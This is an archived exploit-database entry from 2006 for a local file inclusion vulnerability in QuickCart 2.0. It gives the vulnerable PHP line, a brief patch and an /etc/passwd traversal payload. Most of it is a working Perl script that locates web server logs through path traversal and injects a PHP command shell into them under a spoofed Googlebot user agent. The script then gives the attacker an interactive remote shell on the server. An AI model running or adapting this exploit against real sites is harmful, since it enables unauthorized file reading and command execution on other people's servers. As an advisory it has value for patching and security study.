QuickCart 2.0 - 'categories.php' Local File Inclusion

EDB-ID:

2889


Author:

r0ut3r

Type:

webapps


Platform:

PHP

Date:

2006-12-03


#################################################################################################
#                                    r0ut3r Presents...                                         #
#                                                                                               #
#                                Another r0ut3r discovery!                                      #
#                                  writ3r [at] gmail.com                                        #
#                                                                                               #
#                        QuickCart 2.0 Local File Inclusion Exploit                             #
#################################################################################################
# Software: QuickCart 2.0                                                                       #
#                                                                                               #
# Vendor: http://opensolution.org/                                                              #
#                                                                                               #
# Released: 2006/12/03                                                                          #
#                                                                                               #
# Critical: Moderately crtical                                                                  #
#                                                                                               #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)                                       #
#                                                                                               #
# Note: The information provided in this document is for Quick Cart administrator               #
# testing purposes only!                                                                        #
#                                                                                               #
# register_globals must be on                                                                   #
# gpc_magic_quotes must be off                                                                  #
#                                                                                               #
# actions_admin/categories.php?config[db_type]=                                                 #
# actions_admin/couriers.php?config[db_type]=                                                   #
# actions_admin/orders.php?config[db_type]=                                                     #
# actions_admin/products.php?config[db_type]=                                                   #
# actions_client/products.php?config[db_type]=                                                  #
# actions_client/orders.php?config[db_type]=                                                    #
#                                                                                               #
# Vulnerable code:                                                                              #
# require_once DIR_CORE.'couriers-'.$config['db_type'].'.php';                                  #
#                                                                                               #
# Patch: (Place this code at the top of every file)                                             #
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))                                      #
#    die();                                                                                     #
#                                                                                               #
# Exploit: categories.php?config[db_type]=../../../../../../../../../../../etc/passwd%00        #
# Usage: perl localfilexpl.pl 127.0.0.1  actions_admin/categories.php?config[db_type]=          #
#################################################################################################

############################################################################
#                   Local File Inclusion Exploiter                         #
#                                                                          #
# This script attempts to exploit a local file include vulnerability       #
# by finding a readable http log file, then by sending a specially crafted #
# http request to the server in order to insert a PHP Shell into the       #
# log files. A shell is then spawned.                                      #
#                                                                          #
# Created By r0ut3r (writ3r [at] gmail.com)                                #
############################################################################

use IO::Socket;
use Switch;

$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$vulnf = @ARGV[1]; # /include/WBmap.php?l=
$opt = @ARGV[2]; # -p (not needed)

sub Header()
{
        print q {Local File Inclusion Exploiter - By r0ut3r (writ3r [at]
gmail.com)
-------------------------------------------------------------------
};
}

sub Usage()
{
        print q {Usage: localfilexpl.pl [target] [folder & vulnerable file]
[opt]
Example: localfilexpl.pl localhost /include/WBmap.php?l= -p
opt = -p (To print recieved content)
};
        exit();
}

Header();

if (!$target || !$vulnf) {
        Usage(); }

@targets = (
"var/log/httpd/access_log",
"var/log/httpd/error_log",
"var/log/access_log",
"var/log/error_log",
"var/www/logs/access.log",
"var/www/logs/access_log",
"var/www/logs/error_log",
"var/www/logs/error.log",
"apache/logs/access_log",
"apache/logs/error.log",
"etc/httpd/logs/access.log",
"etc/httpd/logs/access_log",
"etc/httpd/logs/error.log",
"etc/httpd/logs/error_log",
"usr/local/apache/logs/access.log",
"usr/local/apache/logs/access_log",
"usr/local/apache/logs/error.log",
"usr/local/apache/logs/error_log",
"var/log/apache2/error_log",
"var/log/apache2/error.log",
"var/log/apache2/access_log",
"var/log/apache2/access.log",
"access_log",
);

@paths = ();
$dirs = 5;
$count = 0;

foreach $target (@targets)
{
        for(0..$dirs){
                $paths[$count+$_] = "../"x$_ . $target;
        }
        $count += $dirs;
}

print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
#print "$path\n";
        $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
        print $sock "GET ".$vulnf.$path."%00 HTTP/1.1\n";
        print $sock "Host: $target\n";
        print $sock "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
        print $sock "Accept: text/html\n";
        print $sock "Connection: close\n\n\r\n";

        while (<$sock>)
        {
                if (/<title>404 Not Found/)
                {
                        print "[-] Vulnerable file not found! Exiting... \n";
                        exit();
                }

                if (/Permission denied/) {
                        print "[-] Log file found, but permission was denied
to read file. [".$path."] \n"; }

                if (/(.*?).(.*?).(.*?).(.*?) - - \[(.*?)/)
                {
                        if ($path ne $log) {
                                print "[+] Log file found! [".$path."] \n"; }
                        $log = $path;
                }
        }
}

if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }

$cmdfunct = "system";
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo
".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort =>
$port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";

@cmdfunctions = ("exec", "shell_exec", "passthru");
$enabled_funct = false;

$xpl_test = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl_test "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
print $xpl_test "Host: $target\n";
print $xpl_test "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
print $xpl_test "Accept: text/html\n";
print $xpl_test "Connection: close\n\n\r\n";

while (<$xpl_test>)
{
        if (/system\(\) has been disabled for security/)
        {
                print "[-] system() function is disabled. \n";
                foreach $cmdfunct (@cmdfunctions)
                {
                        if ($enabled_funct eq false)
                        {
                                print "[+] Trying ".$cmdfunct."()\n";
                                $code = "<?php ob_clean(); echo 'r0ut3r - Local File Include Expoiter '; echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
                                $xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
                                print $xpl "GET /".$code." HTTP/1.1\n";
                                print $xpl "Host: $target\n";
                                print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
                                print $xpl "Accept: text/html\n";
                                print $xpl "Connection: close\n\n\r\n";

                                $xpl_retry = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect.
Exiting...\r\n";
                                print $xpl_retry "GET ".$vulnf.$path.$log."%00&cmd=dir HTTP/1.1\n";
                                print $xpl_retry "Host: $target\n";
                                print $xpl_retry "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
                                print $xpl_retry "Accept: text/html\n";
                                print $xpl_retry "Connection: close\n\n\r\n";

                                while (<$xpl_retry>)
                                {
                                        if (/b>:  $cmdfunct\(\) has been disabled for security reasons/)
                                        {
                                                print "[-] ".$cmdfunct."() function is disabled. \n";
                                                $enabled_funct = false;
                                                last;
                                        }
                                        else
                                        {
                                                $enabled_funct = true;
                                        }
                                }

                                if ($enabled_funct eq true)
                                {
                                        print "[+] Enabled function found! [".$cmdfunct."]\n";
                                        break;
                                }
                        }
                }

                if ($enabled_funct eq false) {
                print "[-] No enabled cmd function found. Tried system(),
exec(), shell_exec(), passthru()\n"; exit(); }
        }
}

print "[!] Command execution at: http://".$target.$vulnf.$log."%00\n";
print "[+] Creating shell - Type 'exit' to quit\n";

print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;

while ($cmd !~ "exit")
{
        $scmd = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target,
PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
        print $scmd "GET ".$vulnf.$path.$log."%00&cmd=".substr($cmd, 0, -1)."
HTTP/1.1\n";
        print $scmd "Host: $target\n";
        print $scmd "User-Agent: Googlebot/2.1
(+http://www.google.com/bot.html)\n";
        print $scmd "Accept: text/html\n";
        print $scmd "Connection: close\n\n\r\n";

        # prints output from command execution
        if ($opt eq "-p")
        {
                while (<$scmd>)
                {
                        print <$scmd>;
                }
        }

        print "[cmd]\$ ";
        $cmd = <STDIN>;
        $cmd =~ s/ /%20/g;
}

# milw0rm.com [2006-12-03]